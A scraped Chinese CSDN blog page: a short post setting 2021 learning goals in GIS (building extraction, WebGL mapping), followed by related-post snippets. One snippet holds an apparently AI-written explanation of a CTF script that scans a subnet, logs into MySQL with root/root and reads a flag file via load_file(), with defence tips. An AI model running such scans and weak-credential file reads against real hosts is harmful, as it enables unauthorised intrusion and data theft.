2021给自己立个Flag

最新推荐文章于 2021-12-29 05:00:00 发布
原创 最新推荐文章于 2021-12-29 05:00:00 发布 · 381 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#gis


方向一:机器学习

定个小目标(挖个坑),使用机器学习技术,根据影像地图自动提取建筑物轮廓,用开源库实现。


方向二:地图可视化

研究 WebGL 技术,切入点 MapboxGL、Three.js、deck.gl

这个暂时还没有想好该如何挖坑,就先插个旗子,遇坑填坑


以上两个方向,有阶段性成果,或填坑心得时,会写出来和大家分享。

最后祝大家在新的一年里,写代码没有bug,牛气冲天,工资翻倍!

原文地址:http://gisarmory.xyz/blog/index.html?blog=GISer2021Flag

关注公众号《GIS兵器库》, 第一时间获得更多高质量GIS文章。

本文章采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可。欢迎转载、使用、重新发布,但务必保留文章署名《GIS兵器库》(包含链接: http://gisarmory.xyz/blog/),不得用于商业目的,基于本文修改后的作品务必以相同的许可发布。

GIS兵器库
关注
2021年新年Flag
韩俊强的博客
12-31 1704
转眼间一年不足1天,2020年很快进入了倒计时。每年都过的如此之快,忙忙碌碌又是一年。这一年大环境经历了一场疫情,让不少人陷入焦虑,无论是职场白领还是中小企业CEO,都面临了一场“灾难”...
2020年终总结-2021新年Flag
韩俊强的博客
12-31 1448
转眼间一年不足1天,2020年很快进入了倒计时。每年都过的如此之快,忙忙碌碌又是一年。这一年大环境经历了一场疫情,让不少人陷入焦虑,无论是职场白领还是中小企业CEO,都面临了一场“灾难”性的打击,无独有偶,我也受到些影响。下面总结一下今年这一年的各个方面的得失与收获。 2020年的Flag实现了多少? 尽管疫情如此无情,依然无法阻挡爱岗敬业的精神。推进2020年初下的Flag,哦,先看看完成情况: 今年完成度70%,相对去年要稍低一些。Flag的目的是激励自己去努力实现和充满影响力,最重要的是提升.
flag
Python之禅的专栏
10-19 355
除了Python,现在还有哪门语言最火?答案当然是 JavaScript,特别是最近两年大前端时代的兴起,前端开发要求变得越来越高。还记得几年前移动互联网刚兴起的时候吗?...
FLAG
GGGGITFKBJG的主页
05-08 491
写在前面: 本屌打算开始刷leetcode了,之前刷过一本面试算法题,不过当时没有写笔记到现在快忘光了。。 做笔记还是个非常的好习惯的,我也要向优秀的人学习记笔记了,虽然有些费时间,但是超值! 2019年4月12号开始,本贴做个记录。 先FLAG,我要把leetcode八百题刷完。 就这样,OK。 2019.05.08 ...
gisarmory.blog:GIS兵器库-技术博客
05-12
GIS兵器库 GIS开发入门 针对GIS专业在校大学生,毕业后如果做想做GIS开发,那现在需要需要学什么。 开源GIS开发 ...2021给自己Flag 我的开源GIS解决方案之路 获取更多相关GIS文章,请访问GIS兵器库
MongoDB Study Plan学习计划Flag
tyzh2010的博客
12-14 413
这一篇是关于MongoDB的学习计划,目的是为了获取MongoDB的certification,也是为了督促自己,以及方便日后复习,我是一个忘性很大的人.... 这是第一次公开flag,之前flag不知道倒了多少次。flag插满全身.... 1. Certification相关信息: 详细参考:https://university.mongodb.com/certification 学习MongoDB university 上面对应的课程,然后注册参加一个考试the Certific...
【在优快云创作2021年度总结】2021年的第一场雪,来的比以往更早一些
wenyusuran的专栏
12-29 1864
前言 站在2021年的末尾,当我们回顾2020年初flag的时候,你在年初的豪言壮语,各种计划表有多少实现了呢?感谢大家在2021年的全程陪伴,2022年,我们收拾好行装,继续前行。 我的收获 新星计划第二季人工智能赛道导师、人工智能领域优秀创作者、5万粉丝、近1000个专栏订阅,除开这些虚的,最主要的是收获了大家的支持和认可,这是我2021年最大的成功! 新的“蜕变” 能够陪着网站一起成长,见证它的每一次改变 ,看着一个产品从无到有、从小到大、从弱变强,而我本身也...
一个flag
AnnieL
07-13 371
下人生的第三个flag 这个暑假再做20道动态规划题目(当然不是水题)
Flag
qq_45695839的博客
02-26 237
这个学期每周至少打一次codeforces
来,flag
涛哥聊Python
01-08 769
很多人怕flag,怕被打脸,其实我要说的,我们应该多flag。为什么要flag?因为flag有太多好处了。及时思考自己的目标方向。很多时候不是我们不努力,而是方向不够明确,知道自...
flag
edxuanlen的博客
10-18 1237
折腾了好几天搭不成个博客,我有点心塞 百度还是不能完美的拯救小白 在此flag 一年内必将自己搭建一个属于自己的博客!!! emmm   这是我博客的开始! 希望不止! 报了个蓝桥杯=。=  好好好努力! ps:最近接触了Linux系统(Ubuntu14.04)感觉很棒 ,但是不太会用! 接触了python感觉很喜欢! 希望 这种热爱 我能保持下去
今天flag
weixin_40300458的博客
07-15 1144
准备把《IBM SPSS数据分析与挖掘实战案例精粹》复习一下,顺便用python代替spss modeler实现数据梳理和算法,一来巩固下统计学知识,二来加强下coding能力!!!学校镇楼!!!...
这个给我分析出flag
最新发布
08-23
<think>我们正在分析一个用于从MySQL数据库中获取flag的Python脚本。根据引用[3]的代码,该脚本尝试通过MySQL漏洞读取文件并获取flag。 代码分析: 1. 主循环:遍历IP地址192.168.1.1到192.168.1.253(即i从1到254,但不包括254,因为range(1,254)是1到253)。 2. 对于每个IP地址,调用MySQL_Connect函数。 3. MySQL_Connect函数: - 尝试使用用户名"root"和密码"root"连接到目标IP的"mysql"数据库。 - 如果连接成功,则尝试执行SQL查询:`select load_file('/flagvalue.txt');` 这个函数用于读取服务器上的文件。 - 如果查询成功,将读取的结果(即文件/flagvalue.txt的内容)作为flag,同时记录目标IP。 - 然后调用Mysql_Inject函数,将目标IP和flag插入到本地数据库(127.0.0.1上的数据库"python"的表"py"中)。 4. Mysql_Inject函数: - 连接本地数据库(127.0.0.1,用户root,密码123456,数据库python)。 - 构建插入语句,将IP和flag插入到表py中。 因此,获取flag的方法是通过MySQL的`load_file`函数读取目标服务器上的文件`/flagvalue.txt`。这需要满足以下条件: - 目标MySQL服务器允许远程连接(且我们尝试的IP地址中有MySQL服务)。 - 目标MySQL服务器的root用户密码为"root"(因为代码中使用了这个密码)。 - 目标MySQL服务器具有读取文件`/flagvalue.txt`的权限(通常需要MySQL有FILE权限,并且该文件对MySQL用户可读)。 注意:这个脚本利用了弱密码(root/root)和MySQL的FILE权限来读取文件。 如果用户想要在自己的环境中使用这个脚本,需要: - 修改目标IP范围(当前是192.168.1.0/24网段)以匹配目标环境。 - 确保本地数据库(127.0.0.1)中存在名为“python”的数据库,并且其中有表“py”(包含两个字段,用于存储IP和flag)。 - 确保本地数据库的用户名和密码正确(当前为root/123456)。 但是,请注意,未经授权尝试访问他人的计算机系统是非法的。此代码仅用于CTF比赛或授权测试。 根据引用[3],我们还可以看到,这个脚本在CTF比赛中使用,用于自动化地从一个网络中的多个MySQL服务器中获取flag(假设这些服务器存在弱密码漏洞并且flag存放在/flagvalue.txt文件中)。 因此,获取flag的核心方法就是利用弱密码登录MySQL,然后通过`load_file`函数读取flag文件。 相关问题: 1. 如何防御这种类型的攻击? 2. 除了使用弱密码,还有哪些常见的MySQL漏洞可以利用? 3. 在CTF比赛中,还有哪些其他获取flag的常见方法?</think>### 分析Python代码获取flag的方法 以下是对引用[3]中Python代码的逐段分析,核心是通过MySQL漏洞获取flag: 1. **主循环结构** 遍历IP段192.168.1.1~192.168.1.253,对每个IP发起攻击: ```python for i in range(1,254): ip = '192.168.1.%s'%i MySQL_Connect(ip) # 对每个IP调用连接函数 ``` 2. **MySQL连接函数** 尝试用弱密码`root/root`登录目标MySQL服务器: ```python def MySQL_Connect(ip): try: db = MySQLdb.connect(ip,"root","root","mysql") # 使用默认凭据 cursor = db.cursor() except: pass # 连接失败则跳过 ``` 3. **关键漏洞利用** 通过`load_file()`读取服务器上的flag文件: ```python cursor.execute("select load_file('/flagvalue.txt');") # 读取指定路径文件 result = cursor.fetchall() flag = result[0][0] # 提取第一行第一列作为flag ``` 4. **结果存储** 将获取的flag回传到攻击者数据库: ```python Mysql_Inject(ip,flag) # 调用存储函数 print "get %s flag!"%ip # 打印成功信息 ``` 5. **数据持久化** 将flag存入本地MySQL数据库: ```python def Mysql_Inject(ip,flag): db = MySQLdb.connect("127.0.0.1","root","123456","python") cursor.execute("insert into py values(\"%s\",\"%s\");"%(ip,flag)) db.commit() # 提交事务 ``` ### 攻击原理总结 1. **攻击面**:利用MySQL服务的**弱密码漏洞**(root/root) 2. **漏洞利用**:通过`load_file()`函数**读取服务器文件**(需FILE权限) 3. **目标文件**:预设路径`/flagvalue.txt` 4. **数据回传**:将窃取的flag存入本地数据库表`py` ### 防御建议 - 修改MySQL默认凭据 - 限制`FILE`权限和`load_file()`使用 - 设置文件系统权限保护flag文件 - 使用网络隔离防止内网扫描 --- ### 相关问题 1. MySQL的`load_file()`函数有哪些安全风险?如何防范? 2. 在CTF比赛中,除了弱密码攻击,还有哪些常见的数据获取方式? 3. 如何通过Python代码检测MySQL服务的弱密码漏洞? 4. 若flag文件路径未知,有哪些自动化探测方法? [^1]: Python标志(Python flag)的含义及用法 [^2]: 遗传算法详解python代码实现以及实例分析 [^3]: CTF比赛中使用Python通过Mysql漏洞获取FLAG
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值